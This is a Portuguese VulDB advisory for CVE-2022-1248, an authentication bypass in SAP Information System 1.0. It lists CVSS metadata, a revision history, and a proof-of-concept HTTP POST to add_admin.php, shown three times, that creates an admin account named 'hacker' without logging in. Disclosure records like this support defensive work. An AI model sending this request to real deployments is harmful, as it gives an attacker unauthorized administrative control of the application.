Uma vulnerabilidade classificada como crítico foi encontrada em SAP Information System 1.0. Afectado é uma função desconhecida do ficheiro /SAP_Information_System/controllers/add_admin.php do componente POST Request Handler. A manipulação com uma entrada desconhecida leva a Fraca autenticação. Usar a CWE para declarar o problema leva à CWE-287.
A vulnerabilidade é identificada como CVE-2022-1248. O ataque pode ser levado a cabo através da rede. Os detalhes técnicos estão disponíveis. Além disso, há uma exploração disponível.
É declarado como proof-of-concept. A exploração está disponível em vuldb.com. Como 0 dia, o preço estimado do subsolo foi de cerca de $0-$5k.
Campo | 06/04/2022 05h10 | 08/04/2022 10h18 | 08/04/2022 10h24 |
---|
cvss3_vuldb_av | N | N | N |
cvss3_vuldb_ac | L | L | L |
cvss3_vuldb_pr | N | N | N |
cvss3_vuldb_ui | N | N | N |
cvss3_vuldb_s | U | U | U |
cvss3_vuldb_c | L | L | L |
cvss3_vuldb_i | L | L | L |
cvss3_vuldb_a | L | L | L |
cvss3_vuldb_e | P | P | P |
cvss3_vuldb_rc | R | R | R |
availability | 1 | 1 | 1 |
cve | CVE-2022-1248 | CVE-2022-1248 | CVE-2022-1248 |
responsible | VulDB | VulDB | VulDB |
date | 1649196000 (06/04/2022) | 1649196000 (06/04/2022) | 1649196000 (06/04/2022) |
cvss2_vuldb_av | N | N | N |
cvss2_vuldb_ac | L | L | L |
cvss2_vuldb_au | N | N | N |
cvss2_vuldb_ci | P | P | P |
cvss2_vuldb_ii | P | P | P |
cvss2_vuldb_ai | P | P | P |
cvss2_vuldb_e | POC | POC | POC |
cvss2_vuldb_rc | UR | UR | UR |
cvss2_vuldb_rl | ND | ND | ND |
cvss3_vuldb_rl | X | X | X |
cvss2_vuldb_basescore | 7.5 | 7.5 | 7.5 |
cvss2_vuldb_tempscore | 6.4 | 6.4 | 6.4 |
cvss3_vuldb_basescore | 7.3 | 7.3 | 7.3 |
cvss3_vuldb_tempscore | 6.6 | 6.6 | 6.6 |
cvss3_meta_basescore | 7.3 | 7.3 | 7.3 |
cvss3_meta_tempscore | 6.6 | 6.9 | 6.9 |
price_0day | $0-$5k | $0-$5k | $0-$5k |
name | SAP Information System | SAP Information System | SAP Information System |
version | 1.0 | 1.0 | 1.0 |
component | POST Request Handler | POST Request Handler | POST Request Handler |
file | /SAP_Information_System/controllers/add_admin.php | /SAP_Information_System/controllers/add_admin.php | /SAP_Information_System/controllers/add_admin.php |
cwe | 287 (Fraca autenticação) | 287 (Fraca autenticação) | 287 (Fraca autenticação) |
risk | 2 | 2 | 2 |
sourcecode | POST /SAP_Information_System/controllers/add_admin.php HTTP/1.1
Host: target.com
Content-Length: 345
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYELEK8fMdX63l0iI
Origin: http://target.com
Referer: http://target.com/SAP_Information_System/Dashboard/pages/Admin.php
Accept-Encoding: gzip, deflate
Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=jjnkf4nmpdm7sca82btt2r4s1c
Connection: close
------WebKitFormBoundaryYELEK8fMdX63l0iI
Content-Disposition: form-data; name="username"
hacker
------WebKitFormBoundaryYELEK8fMdX63l0iI
Content-Disposition: form-data; name="password"
P@ssw0rd!
------WebKitFormBoundaryYELEK8fMdX63l0iI
Content-Disposition: form-data; name="user"
admin
------WebKitFormBoundaryYELEK8fMdX63l0iI-- | POST /SAP_Information_System/controllers/add_admin.php HTTP/1.1
Host: target.com
Content-Length: 345
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYELEK8fMdX63l0iI
Origin: http://target.com
Referer: http://target.com/SAP_Information_System/Dashboard/pages/Admin.php
Accept-Encoding: gzip, deflate
Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=jjnkf4nmpdm7sca82btt2r4s1c
Connection: close
------WebKitFormBoundaryYELEK8fMdX63l0iI
Content-Disposition: form-data; name="username"
hacker
------WebKitFormBoundaryYELEK8fMdX63l0iI
Content-Disposition: form-data; name="password"
P@ssw0rd!
------WebKitFormBoundaryYELEK8fMdX63l0iI
Content-Disposition: form-data; name="user"
admin
------WebKitFormBoundaryYELEK8fMdX63l0iI-- | POST /SAP_Information_System/controllers/add_admin.php HTTP/1.1
Host: target.com
Content-Length: 345
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYELEK8fMdX63l0iI
Origin: http://target.com
Referer: http://target.com/SAP_Information_System/Dashboard/pages/Admin.php
Accept-Encoding: gzip, deflate
Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=jjnkf4nmpdm7sca82btt2r4s1c
Connection: close
------WebKitFormBoundaryYELEK8fMdX63l0iI
Content-Disposition: form-data; name="username"
hacker
------WebKitFormBoundaryYELEK8fMdX63l0iI
Content-Disposition: form-data; name="password"
P@ssw0rd!
------WebKitFormBoundaryYELEK8fMdX63l0iI
Content-Disposition: form-data; name="user"
admin
------WebKitFormBoundaryYELEK8fMdX63l0iI-- |
cvss3_cna_av | | N | N |
cvss3_cna_ac | | L | L |
cvss3_cna_pr | | N | N |
cvss3_cna_ui | | N | N |
cvss3_cna_s | | U | U |
cvss3_cna_c | | L | L |
cvss3_cna_i | | L | L |
cvss3_cna_a | | L | L |
cve_cna | | VulDB | VulDB |
cvss3_cna_basescore | | 7.3 | 7.3 |
cve_nvd_summary | | | A vulnerability was found in SAP Information System 1.0 which has been rated as critical. Affected by this issue is the file /SAP_Information_System/controllers/add_admin.php. An unauthenticated attacker is able to create a new admin account for the web application with a simple POST request. Exploit details were disclosed. |